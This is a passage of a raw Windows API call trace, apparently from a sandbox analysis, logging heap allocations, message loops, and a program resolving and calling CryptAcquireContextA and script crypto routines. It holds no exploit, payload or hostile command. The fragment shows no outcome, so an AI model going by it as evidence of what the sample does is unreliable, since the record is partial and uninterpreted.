lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0211.429] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0211.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0211.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0211.429] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0211.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0211.431] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0211.431] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0211.431] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0211.431] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0211.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.431] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.431] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0211.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0211.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0211.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0211.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0211.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0211.432] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.433] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.433] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0211.433] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0211.433] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0211.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0211.433] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0211.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0211.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.434] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.434] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.434] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0211.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0211.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0211.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0211.435] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.435] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0211.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bd8 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0211.435] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0211.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0211.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0211.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0211.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0211.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0211.437] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0211.437] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.438] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0211.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0211.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0211.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: 